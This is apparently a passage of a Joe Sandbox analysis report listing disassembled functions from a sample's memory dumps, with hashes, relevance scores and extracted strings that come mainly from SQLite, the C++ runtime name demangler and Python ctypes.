                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B314CB6609FC186EB708F60E9803AA6379FB84764F40417ADA4E57A95EF3CE5488710
                                                                                                                                                                                                                                                                    Function 00007FFB0C03C380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                                                    • API String ID: 0-3175670447
                                                                                                                                                                                                                                                                    • Opcode ID: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
                                                                                                                                                                                                                                                                    • Instruction ID: 21dd2e07d5964e0343ccf5128236c9a6e6af9a585092f73f52b97a696bd3ebb6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF1B0B2A0878686E764DF35D048B6E77A4FB84B88F014135DE5D97798EF38D844CB48
                                                                                                                                                                                                                                                                    Function 00007FFB1C257BDC Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 381COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                                                                    • Opcode ID: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
                                                                                                                                                                                                                                                                    • Instruction ID: 78a4183b0eafddf3b29801e9f898a6b5be62db6f2e69049d5e819d06dfe3ea90
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 180263E2F58E12CAF714AB74D4582FE27A2BB06764F644135CE0D16B98DFADAD44C380
                                                                                                                                                                                                                                                                    Function 00007FFB1C25B64C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: `anonymous namespace'
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-3062148218
                                                                                                                                                                                                                                                                    • Opcode ID: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
                                                                                                                                                                                                                                                                    • Instruction ID: ab44b3e34776cbfdc49f06be53080314504cd7e1821602de15af920ee26d6375
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE17BF2A08F8296EB10AF34E4881EA77A2FB45764F645031EB4D17B95DF38D954CB80
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FD4F0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007A3440ErrorLast
                                                                                                                                                                                                                                                                    • String ID: Parsing argument %zd$cannot build parameter$create argument %zd:$memory leak in callback function.$on calling ctypes callback function$on converting result of ctypes callback function$unexpected result of create argument %zd:
                                                                                                                                                                                                                                                                    • API String ID: 848807496-1876801404
                                                                                                                                                                                                                                                                    • Opcode ID: aa32c78b9395636ceacc966a5ec85ec568c26a00442ece316da8dead0e0a2199
                                                                                                                                                                                                                                                                    • Instruction ID: 6e82aadeeaaac3ad489b2c30d3fbc1253183e99376ca1da9b69be356dafea44d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa32c78b9395636ceacc966a5ec85ec568c26a00442ece316da8dead0e0a2199
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B150B2A04E4285EF54DF35E8642696362FF25BA8F44A53AE92D477B4DF3CE448C300
                                                                                                                                                                                                                                                                    Function 00007FFB1C25C4B4 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                                                                                                                                                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                                                    • API String ID: 2331677841-2441609178
                                                                                                                                                                                                                                                                    • Opcode ID: 3c29747ae8710b15564f16d6c1c734fd538530989b0780686262821ebccf47fd
                                                                                                                                                                                                                                                                    • Instruction ID: 636c22e7aee314083cab4f247b0a89b6e442d6b6f2597933e498cdf89a758e2d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c29747ae8710b15564f16d6c1c734fd538530989b0780686262821ebccf47fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBF151F2E08E5286FA15BB74C55C1FE2662AF4A764F640236CD0D27B95EF3CAD4582C0
                                                                                                                                                                                                                                                                    Function 00007FFB1C259B14 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                                                                                    • Instruction ID: 23150599fc764bc595b6eb95995090ddc5d2959b1a432a75b326035cc2c670cf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59F18BF6B08A829AE710FF74E4941FE37B2AB0675CB544036EA0D57B99DE38D915C380
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A69BC Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 120COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-1845899854
                                                                                                                                                                                                                                                                    • Opcode ID: 81f0315fdac4b158a46847c30f6c6da32f3beb1c5dcd7c36fb0fbca1c06307aa
                                                                                                                                                                                                                                                                    • Instruction ID: befa09f8aee252627494d2649b885278358fba08dace6cc9a98c407a34e39649
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f0315fdac4b158a46847c30f6c6da32f3beb1c5dcd7c36fb0fbca1c06307aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E517CE5B08B4286EE149F76E84897963A1FF84B90F4841B1DE5E47BA4EF3CE446C700
                                                                                                                                                                                                                                                                    Function 00007FFB0C09D610 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                                    • API String ID: 0-3733955532
                                                                                                                                                                                                                                                                    • Opcode ID: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                                    • Instruction ID: 5f8d6c89447f2467c1ba53cb90b25ae50a32ceb0470267f30223c886d3835fe9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00029CE1A4DB8285EA599B31E45CBB963A1FF85B81F484135DE5E077A1EF3CE508C308
                                                                                                                                                                                                                                                                    Function 00007FFB0C05B0C0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFB0C05B1C3
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFB0C05B2A4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-875588658
                                                                                                                                                                                                                                                                    • Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                    • Instruction ID: fde7c398ef4605b5f975d0e996263224f7bd3953f91492619d397a7535785441
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE16EF2F086528BFB25CF74D458BBD37A0AF04748F444135DA4E66A99EF38A845C748
                                                                                                                                                                                                                                                                    Function 00007FFB0C077760 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFB0C0778F7, 00007FFB0C077973, 00007FFB0C077A81
                                                                                                                                                                                                                                                                    • cannot add a STORED column, xrefs: 00007FFB0C077A72
                                                                                                                                                                                                                                                                    • Cannot add a PRIMARY KEY column, xrefs: 00007FFB0C077881
                                                                                                                                                                                                                                                                    • Cannot add a column with non-constant default, xrefs: 00007FFB0C077969
                                                                                                                                                                                                                                                                    • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFB0C07790F
                                                                                                                                                                                                                                                                    • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFB0C077C5C
                                                                                                                                                                                                                                                                    • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFB0C077B14
                                                                                                                                                                                                                                                                    • Cannot add a UNIQUE column, xrefs: 00007FFB0C07789C
                                                                                                                                                                                                                                                                    • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFB0C0778ED
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-200680935
                                                                                                                                                                                                                                                                    • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                    • Instruction ID: 1f3181db8793ffac6fad5e85c5f5e5c6591ddfc7c0efae05483cabd4956e60f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE1B0E1A09B8285EB6A8B39D148B7923A1FF44BC4F648235DE8D07795EF3CE455C708
                                                                                                                                                                                                                                                                    Function 00007FFB1C2519D4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 4223619315-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                                                                                    • Instruction ID: fa7fb75d62b7b4ebdd1d0df13c432006271b1b1c6cd371580c2319c06b64b1c9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97D14FE2A08B4187EB20ABB5D4493EE67A2FB467A8F300135DE4D57755DF38E891C780
                                                                                                                                                                                                                                                                    Function 00007FFB1C257888 Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
                                                                                                                                                                                                                                                                    • Instruction ID: 43c7f1a651a8bdf71d147bdc26858b45025d6ebf886c8e09b8baee745e5e17d5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE7149F2B54A42AAEB10EF74D4541ED23B2AB05B9CB904431DE0D57B99EF38DA19C3D0
                                                                                                                                                                                                                                                                    Function 00007FFB1C25D650 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
